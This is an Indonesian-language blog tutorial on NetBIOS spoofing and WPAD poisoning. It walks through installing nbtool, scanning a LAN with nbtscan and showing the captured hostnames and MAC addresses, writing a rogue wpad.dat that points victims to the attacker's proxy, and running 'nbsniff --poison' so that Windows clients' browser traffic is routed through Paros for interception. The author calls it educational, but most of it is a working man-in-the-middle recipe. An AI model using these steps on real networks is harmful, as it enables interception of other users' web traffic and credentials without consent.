netbiosSpoofing (video)

oke.,.kali ini kembali lagi dengan saya mr yur4kh4.,.:D
sebelumnya..tulisan ini hanya untuk sebagai bahan pembelajaran saja, tidak ada niat lain selain berbagi tentang keamanan sistem operasi, dalam kesempatan ini saya juga mengingatkan sahabat-sahabat bahwa sangat banyak celah yang bisa di manfaatkan untuk melakukan hal-hal yang patut untuk kita ketahui. berhati-hatilah saat berada di tengah orang-orang yang ada di sekeliling sahabat,,heee...kembali saya mengingatkankan bahwa rangkaian terlemah dari sebuah system adalah kita sendiri..upz.,.malah jadi ceramah...:p


kali ini saya akan mencoba berbagi tentang bagaimana cara melakukan spoofing pada netbios :)

NetBIOS adalah sistem penamaan dan pengalamatan komputer yang umum untuk Windows terutama dalam LAN, bukan berarti serangan semacam ini tidak berlaku di WLAN lo.,.hee...
NetBIOS digunakan oleh aplikasi-aplikasi yang memakai jasa protokol dan API NetBIOS,
apa ke untungannya dengan melakukan spoofing terhadap net bios???
jawabnya :
kita tidak memakai ARP lagi (yg lazim di gunakan saat sniffing / spoofing)
oke tanpa berpanjang lebar...:), langsung ke pokok bahasan

tools yang kita butuhkan kali ini adalah :

* nbtool
* parosproxy

jika belum memiliki tools tersebut silahkan lakukan installasi dulu :p

download & install nbtool:

root@dEviRakhjib:~$ svn co http://svn.skullsecurity.org:81/ron/security/nbtool
root@dEviRakhjib:~$ cd nbtool/
root@dEviRakhjib:~$ make
root@dEviRakhjib:~$ make install

jika niatnya untuk belajar saya yakin tidak akan ada halangan dalam installasi tersebut :p

download & install paros :

http://www.parosproxy.org/install.shtml

silahkan baca sendiri dech di site resminya..ahahaa.,.:p


jika semua tools sudah terinstall dengan baik mari kita mulai

1. scan target

yur4kh4@dEviRakhjib:~$ sudo nbtscan -v -s : 172.16.16.1/24
[sudo] password for yur4kh4:
172.16.16.0    Sendto failed: Permission denied
172.16.16.82:ECKO-PC        :20U
172.16.16.82:ECKO-PC        :00U
172.16.16.82:WORKGROUP      :00G
172.16.16.82:WORKGROUP      :1eG
172.16.16.82:WORKGROUP      :1dU
172.16.16.82: __MSBROWSE__ :01G
172.16.16.82:MAC:f0:7b:cb:36:61:8b
172.16.16.52:ASUS-PC        :00U
172.16.16.52:WORKGROUP      :00G
172.16.16.52:ASUS-PC        :20U
172.16.16.52:MAC:48:5d:60:d1:8c:f5

nach..kelihatan kan siapa sajha pengguna windows,
yang perlu di ketahui juga bahwa
NetBIOS terdiri atas dua buah komponen:
1. Nama yang diberikan pada saat melakukan instalasi sistem operasi Windows, yang memiliki panjang  maksimal 15 byte. Nama yang dimaksud dapat berupa nama komputer, nama domain,dll..
2. 1 byte angka heksadesimal yang mengidentifikasikan jenis layanan jaringan atau fungsi tertentu.

jadi jangan heran jika melihat angka-angka hexadecimal.,.:), alangkah baiknya jika sahabat-sahabat membuka google untuk lebih memahami tentang NETbios ini :)

nach saat DNS tidak dapat diresolve oleh windows, maka windows akan melakukan yang namanya WPAD (Web Proxy Auto Directory) yang dimana secara default windows akan mencari WPAD pada netbios gateway di dalam jaringan,

buat dulu WPAD nya...:)

yur4kh4@dEviRakhjib:~$ sudo nano /var/www/wpad.dat

function FindProxyForURL(url, host)
{
  return "PROXY 172.16.16.4:8080";
}

kemudian save, pastikan IP anda yang terisi di sana..:)

pada parosproxy
setting local proxy dengan ip 172.16.16.4 listening di 8080

kemudian lakukan sniffing :D

root@dEviRakhjib:~$ nbsniff --poison -s 172.16.16.4

lihat help nya untuk mengetahui opsi-opsi lainnya..
tunggu dan lihat hasinya...

PENTING :
serangan ini hanya berlaku jika victim meng-active kan
auto-detect proxy settings for this network pada proxy setting di mozillanya...:p

saya yakin banyak yang tidak paham dengan tulisan saya ini..ahahaaa.,.saya memang tidak pandai menulis, tp truz sajha memaksakan diri untuk menulis :p, namanya juga belajar, mumpung masih muda & ganteng lagi.,.wekz.,.
prinsipnya : dipaksa, terpaksa, terbiasa.:)
but jangan khawatir...:), saya sudah membuat versi videonya untuk sahabat-sahabat..:), silahkan di download & di pelajari.

http://www.4shared.com/file/O56BWcNJ/netbios_spoofing.html

format file : *ogv (linux dedicated)
compressed : *zip


jika masih tidak mengerti juga & tidak paham dengan video yang saya buat jangan berkecil hati dulu, saya siap membantu sahabat-sahabat,,:D
conntact sajha langsung

skype : yur4kh4

kalo masih tidak paham juga nantinya,,hhhmm.,.saya tidak ada solusi lagi.,.ihir.,.(just kidd),

semoga apa yang saya tuliskan ini bisa menambah wawasan sahabat-sahabat. AMIN,,

referensi :
http://ray16.info/~me/?p=523
http://www.skullsecurity.org/blog/2009/pwning-hotel-guests

regards : yur4kh4
::::g0o unix g0 open source::::

Search Post

Label :